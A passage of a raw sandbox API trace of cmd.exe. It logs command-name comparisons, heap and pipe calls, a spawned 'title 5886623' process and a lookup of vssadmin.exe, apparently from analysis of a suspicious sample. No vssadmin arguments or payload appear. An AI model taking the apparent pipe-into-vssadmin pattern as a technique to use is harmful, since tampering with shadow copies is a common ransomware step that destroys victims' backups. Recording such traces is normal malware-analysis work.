_wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0202.832] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0202.832] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0202.832] GetProcessHeap () returned 0x2a0000 [0202.832] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xb0) returned 0x2b9ab0 [0202.832] GetProcessHeap () returned 0x2a0000 [0202.832] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2a) returned 0x2b6570 [0202.833] GetProcessHeap () returned 0x2a0000 [0202.833] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x48) returned 0x2b9b70 [0202.834] GetProcessHeap () returned 0x2a0000 [0202.834] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x48) returned 0x2bad40 [0202.834] _pipe (in: _PtHandles=0x2bad50, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x2bad50) returned 0 [0202.835] _dup (_FileHandle=1) returned 5 [0202.835] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0202.836] _close (_FileHandle=4) returned 0 [0202.836] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0202.836] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0202.836] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0202.836] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0202.836] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0202.836] _wcsicmp (_String1="title", _String2="CD") returned 17 [0202.836] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0202.836] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0202.836] _wcsicmp (_String1="title", _String2="REN") returned 2 [0202.836] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0202.836] _wcsicmp (_String1="title", _String2="SET") returned 1 [0202.836] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0202.836] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0202.836] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0202.837] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0202.837] _wcsicmp (_String1="title", _String2="MD") returned 7 [0202.837] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0202.837] _wcsicmp (_String1="title", _String2="RD") returned 2 [0202.837] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0202.837] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0202.837] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0202.837] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0202.837] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0202.837] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0202.837] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0202.837] _wcsicmp (_String1="title", _String2="VER") returned -2 [0202.837] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0202.837] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0202.837] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0202.837] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0202.837] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0202.837] GetProcessHeap () returned 0x2a0000 [0202.837] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x4010) returned 0x2bbd10 [0202.837] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0202.837] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0202.837] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0202.837] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0202.837] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0202.837] _wcsicmp (_String1="title", _String2="CD") returned 17 [0202.837] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0202.837] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0202.838] _wcsicmp (_String1="title", _String2="REN") returned 2 [0202.838] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0202.838] _wcsicmp (_String1="title", _String2="SET") returned 1 [0202.838] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0202.838] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0202.838] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0202.838] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0202.838] _wcsicmp (_String1="title", _String2="MD") returned 7 [0202.838] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0202.838] _wcsicmp (_String1="title", _String2="RD") returned 2 [0202.838] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0202.838] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0202.838] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0202.838] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0202.838] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0202.838] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0202.838] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0202.838] _wcsicmp (_String1="title", _String2="VER") returned -2 [0202.838] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0202.838] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0202.838] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0202.838] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0202.838] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0202.838] GetProcessHeap () returned 0x2a0000 [0202.838] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xb0) returned 0x2b9bc0 [0202.838] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.838] GetProcessHeap () returned 0x2a0000 [0202.838] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x28) returned 0x2b46d0 [0202.839] GetProcessHeap () returned 0x2a0000 [0202.839] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x218) returned 0x2b9c80 [0202.839] GetProcessHeap () returned 0x2a0000 [0202.839] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x7c) returned 0x2b9ea0 [0202.839] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0202.839] GetProcessHeap () returned 0x2a0000 [0202.839] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x420) returned 0x2bfd30 [0202.839] SetErrorMode (uMode=0x0) returned 0x1 [0202.839] SetErrorMode (uMode=0x1) returned 0x0 [0202.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0x2bfd40, lpFilePart=0x1ef0e0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef0e0*="system32") returned 0x13 [0202.839] SetErrorMode (uMode=0x1) returned 0x1 [0202.839] GetProcessHeap () returned 0x2a0000 [0202.839] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2bfd30, Size=0x48) returned 0x2bfd30 [0202.839] GetProcessHeap () returned 0x2a0000 [0202.839] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2bfd30) returned 0x48 [0202.840] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0202.840] GetProcessHeap () returned 0x2a0000 [0202.840] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3e) returned 0x2bad90 [0202.840] GetProcessHeap () returned 0x2a0000 [0202.840] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x68) returned 0x2b9f30 [0202.840] GetProcessHeap () returned 0x2a0000 [0202.840] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2b9f30, Size=0x3e) returned 0x2b9f30 [0202.840] GetProcessHeap () returned 0x2a0000 [0202.840] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2b9f30) returned 0x3e [0202.840] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.840] GetProcessHeap () returned 0x2a0000 [0202.840] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xe8) returned 0x2bfd90 [0202.844] GetProcessHeap () returned 0x2a0000 [0202.844] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2bfd90, Size=0x7e) returned 0x2bfd90 [0202.844] GetProcessHeap () returned 0x2a0000 [0202.844] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2bfd90) returned 0x7e [0202.846] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.846] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x1eee50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eee50) returned 0x2b9f80 [0202.846] GetProcessHeap () returned 0x2a0000 [0202.846] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x28) returned 0x2b4700 [0202.846] FindClose (in: hFindFile=0x2b9f80 | out: hFindFile=0x2b9f80) returned 1 [0202.846] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0202.846] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0202.846] GetConsoleTitleW (in: lpConsoleTitle=0x1ef3a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.847] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef158, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef118 | out: lpAttributeList=0x1ef158, lpSize=0x1ef118) returned 1 [0202.847] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef158, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef108, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef158, lpPreviousValue=0x0) returned 1 [0202.847] GetStartupInfoW (in: lpStartupInfo=0x1ef270 | out: lpStartupInfo=0x1ef270*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0202.847] GetProcessHeap () returned 0x2a0000 [0202.847] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x20) returned 0x2b4730 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.847] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0202.848] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0202.848] GetProcessHeap () returned 0x2a0000 [0202.848] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4730 | out: hHeap=0x2a0000) returned 1 [0202.848] GetProcessHeap () returned 0x2a0000 [0202.848] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x12) returned 0x2b89e0 [0202.848] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.850] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 5886623\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1ef190*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 5886623\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef140 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 5886623\"", lpProcessInformation=0x1ef140*(hProcess=0x60, hThread=0x58, dwProcessId=0x4ec, dwThreadId=0x4d8)) returned 1 [0202.859] CloseHandle (hObject=0x58) returned 1 [0202.859] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0202.859] GetProcessHeap () returned 0x2a0000 [0202.859] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b8b40 | out: hHeap=0x2a0000) returned 1 [0202.859] GetEnvironmentStringsW () returned 0x2b8b40* [0202.859] GetProcessHeap () returned 0x2a0000 [0202.859] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xac4) returned 0x2c0110 [0202.859] FreeEnvironmentStringsW (penv=0x2b8b40) returned 1 [0202.859] GetProcessHeap () returned 0x2a0000 [0202.859] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b89e0 | out: hHeap=0x2a0000) returned 1 [0202.859] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef158 | out: lpAttributeList=0x1ef158) [0202.859] _get_osfhandle (_FileHandle=3) returned 0x54 [0202.859] DuplicateHandle (in: hSourceProcessHandle=0x60, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0202.859] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0202.912] _close (_FileHandle=5) returned 0 [0202.912] _dup (_FileHandle=0) returned 4 [0202.912] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0202.913] _close (_FileHandle=3) returned 0 [0202.914] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe")) returned 0x20 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="DIR") returned 18 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="ERASE") returned 17 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="DEL") returned 18 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="TYPE") returned 2 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="COPY") returned 19 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="CD") returned 19 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="CHDIR") returned 19 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="RENAME") returned 4 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="REN") returned 4 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="ECHO") returned 17 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="SET") returned 3 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="PAUSE") returned 6 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="DATE") returned 18 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="TIME") returned 2 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="PROMPT") returned 6 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="MD") returned 9 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="MKDIR") returned 9 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="RD") returned 4 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="RMDIR") returned 4 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="PATH") returned 6 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="GOTO") returned 15 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="SHIFT") returned 3 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="CLS") returned 19 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="CALL") returned 19 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="VERIFY") returned 14 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="VER") returned 14 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="VOL") returned 4 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="EXIT") returned 17 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="SETLOCAL") returned 3 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="ENDLOCAL") returned 17 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="TITLE") returned 2 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="START") returned 3 [0202.968] _wcsicmp (_String1="vssadmin.exe", _String2="DPATH") returned 18 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="KEYS") returned 11 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="MOVE") returned 9 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="PUSHD") returned 6 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="POPD") returned 6 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="ASSOC") returned 21 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="FTYPE") returned 16 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="BREAK") returned 20 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="COLOR") returned 19 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="MKLINK") returned 9 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="DIR") returned 18 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="ERASE") returned 17 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="DEL") returned 18 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="TYPE") returned 2 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="COPY") returned 19 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="CD") returned 19 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="CHDIR") returned 19 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="RENAME") returned 4 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="REN") returned 4 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="ECHO") returned 17 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="SET") returned 3 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="PAUSE") returned 6 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="DATE") returned 18 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="TIME") returned 2 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="PROMPT") returned 6 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="MD") returned 9 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="MKDIR") returned 9 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="RD") returned 4 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="RMDIR") returned 4 [0202.969] _wcsicmp (_String1="vssadmin.exe", _String2="PATH") returned 6 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="GOTO") returned 15 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="SHIFT") returned 3 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="CLS") returned 19 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="CALL") returned 19 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="VERIFY") returned 14 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="VER") returned 14 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="VOL") returned 4 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="EXIT") returned 17 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="SETLOCAL") returned 3 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="ENDLOCAL") returned 17 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="TITLE") returned 2 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="START") returned 3 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="DPATH") returned 18 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="KEYS") returned 11 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="MOVE") returned 9 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="PUSHD") returned 6 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="POPD") returned 6 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="ASSOC") returned 21 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="FTYPE") returned 16 [0202.970] _wcsicmp (_String1="vssadmin.exe", _String2="BREAK") returned 20 [0202.971] _wcsicmp (_String1="vssadmin.exe", _String2="COLOR") returned 19 [0202.971] _wcsicmp (_String1="vssadmin.exe", _String2="MKLINK") returned 9 [0202.971] _wcsicmp (_String1="vssadmin.exe", _String2="FOR") returned 16 [0202.971] _wcsicmp (_String1="vssadmin.exe", _String2="IF") returned 13 [0202.971] _wcsicmp (_String1="vssadmin.exe", _String2="REM") returned 4 [0202.971] GetProcessHeap () returned 0x2a0000 [0202.971] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x4010) returned 0x2c0be0 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="DIR") returned 18 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="ERASE") returned 17 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="DEL") returned 18 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="TYPE") returned 2 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="COPY") returned 19 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="CD") returned 19 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="CHDIR") returned 19 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="RENAME") returned 4 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="REN") returned 4 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="ECHO") returned 17 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="SET") returned 3 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="PAUSE") returned 6 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="DATE") returned 18 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="TIME") returned 2 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="PROMPT") returned 6 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="MD") returned 9 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="MKDIR") returned 9 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="RD") returned 4 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="RMDIR") returned 4 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="PATH") returned 6 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="GOTO") returned 15 [0202.972] _wcsicmp (_String1="vssadmin.exe", _String2="SHIFT") returned 3 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="CLS") returned 19 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="CALL") returned 19 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="VERIFY") returned 14 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="VER") returned 14 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="VOL") returned 4 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="EXIT") returned 17 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="SETLOCAL") returned 3 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="ENDLOCAL") returned 17 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="TITLE") returned 2 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="START") returned 3 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="DPATH") returned 18 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="KEYS") returned 11 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="MOVE") returned 9 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="PUSHD") returned 6 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="POPD") returned 6 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="ASSOC") returned 21 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="FTYPE") returned 16 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="BREAK") returned 20 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="COLOR") returned 19 [0202.973] _wcsicmp (_String1="vssadmin.exe", _String2="MKLINK") returned 9 [0202.973] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0202.974] GetProcessHeap () returned 0x2a0000 [0202.974] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x420) returned 0x2b8b40 [0202.974] SetErrorMode (uMode=0x0) returned 0x1 [0202.974] SetErrorMode (uMode=0x1) returned 0x0 [0202.974] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2b8b50, lpFilePart=0x1ef350 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef350*="system32") returned 0x13 [0202.974] SetErrorMode (uMode=0x1) returned 0x1 [0202.974] GetProcessHeap () returned 0x2a0000 [0202.974] RtlReAllocateHeap (Heap=0x2a0000, Flags=0x0, Ptr=0x2b8b40, Size=0x52) returned 0x2b8b40 [0202.974] GetProcessHeap () returned 0x2a0000 [0202.974] RtlSizeHeap (HeapHandle=0x2a0000, Flags=0x0, MemoryPointer=0x2b8b40) returned 0x52 [0202.974] 